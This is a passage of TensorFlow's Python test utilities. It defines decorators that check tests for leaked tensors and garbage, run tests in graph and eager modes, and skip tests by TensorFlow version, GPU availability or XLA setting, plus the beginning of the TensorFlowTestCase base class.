"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various versions
# of python2.7.x.
for _ in range(2):
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
      # In some cases (specifically on MacOS), new_count is somehow
      # smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" %
(new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of refferents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
if not kwargs:
return [OrderedDict()]
sort_by_key = lambda k: k[0][0]
kwargs = OrderedDict(sorted(kwargs.items(), key=sort_by_key))
first = list(kwargs.items())[0]
rest = dict(list(kwargs.items())[1:])
rest_combined = _combine_named_parameters(**rest)
key = first[0]
values = first[1]
if not isinstance(values, list):
values = [values]
combinations = [
OrderedDict(sorted(list(combined.items()) + [(key, v)], key=sort_by_key))
for v in values
for combined in rest_combined
]
return combinations
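# Worked example (values illustrative):
#   _combine_named_parameters(mode=["graph", "eager"], use_gpu=True)
# returns
#   [OrderedDict([("mode", "graph"), ("use_gpu", True)]),
#    OrderedDict([("mode", "eager"), ("use_gpu", True)])]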
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
  dictionaries returned. The 'testcase_name' key is required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith(
unittest.TestLoader.testMethodPrefix) and not (
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or name == "test_session"):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
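A minimal sketch of intended usage; the test body only performs static graph
checks and never evaluates tensors:
```python
class StaticShapeTest(tf.test.TestCase, parameterized.TestCase):

  @build_as_function_and_v1_graph
  def test_zeros_shape_is_static(self):
    x = tf.zeros([2, 3])
    self.assertEqual([2, 3], x.shape.as_list())  # static check only
```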
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
raise ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return decorated
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.get_default_graph()._building_function:
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
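A minimal sketch (not the only possible pattern); tensors are passed directly
to the assertion so it can be wrapped in a py_func when traced:
```python
class AddTest(tf.test.TestCase):

  @also_run_as_tf_function
  def test_add(self):
    # Runs once eagerly and once inside a traced tf.function.
    self.assertAllEqual(tf.add(1, 2), 3)
```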
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
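For illustration, a hedged sketch of a test that relies on graph-only
constructs such as placeholders:
```python
class FeedTest(tf.test.TestCase):

  @deprecated_graph_mode_only
  def test_feed(self):
    x = tf.compat.v1.placeholder(tf.float32, shape=[])
    y = x * 2.0
    with self.cached_session() as sess:
      self.assertAllClose(6.0, sess.run(y, feed_dict={x: 3.0}))
```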
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if tf2.enabled():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
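A minimal sketch (the reason string is arbitrary):
```python
class SessionTest(tf.test.TestCase):

  @run_v1_only("Uses tf.compat.v1.Session directly")
  def test_session_run(self):
    with tf.compat.v1.Session() as sess:
      self.assertEqual(7, sess.run(tf.constant(7)))
```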
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
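For illustration, a hedged sketch:
```python
class MatmulGpuTest(tf.test.TestCase):

  @run_gpu_only
  def test_matmul_on_gpu(self):
    with tf.device("/device:GPU:0"):
      product = tf.matmul([[2.0]], [[3.0]])
    self.assertAllClose([[6.0]], self.evaluate(product))
```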
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None, this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function will
also return False. Use `tf.test.is_built_with_cuda` to validate whether
TensorFlow was built with CUDA support.
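For example, a common pattern is to skip a test when no suitable GPU is
present (the compute capability below is an arbitrary illustration):
```python
if not tf.test.is_gpu_available(cuda_only=True,
                                min_cuda_compute_capability=(3, 5)):
  self.skipTest("Needs a CUDA GPU with compute capability >= 3.5")
```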
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading: the routine will
return True when a GPU device is available, irrespective of whether TF was
built with CUDA support or ROCm support. However, no changes are made here
because:
++ Changing the name "cuda_only" to something more generic would break
backward compatibility.
++ Adding an equivalent "rocm_only" would require the implementation to check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility.
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only".
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders, we should be able
to call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used to
# signal completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
The given decorator is expected to take some arguments and return a
decorator that is then called on each test method to produce the decorated
method.
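A hedged sketch of intended usage, applying `run_v1_only` (defined above) to
every test method of a class:
```python
@for_all_test_methods(run_v1_only, "this suite relies on v1-only behavior")
class LegacySuite(tf.test.TestCase):

  def test_legacy_behavior(self):
    ...  # body elided; each test_* method is skipped under v2
```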
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given class's test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
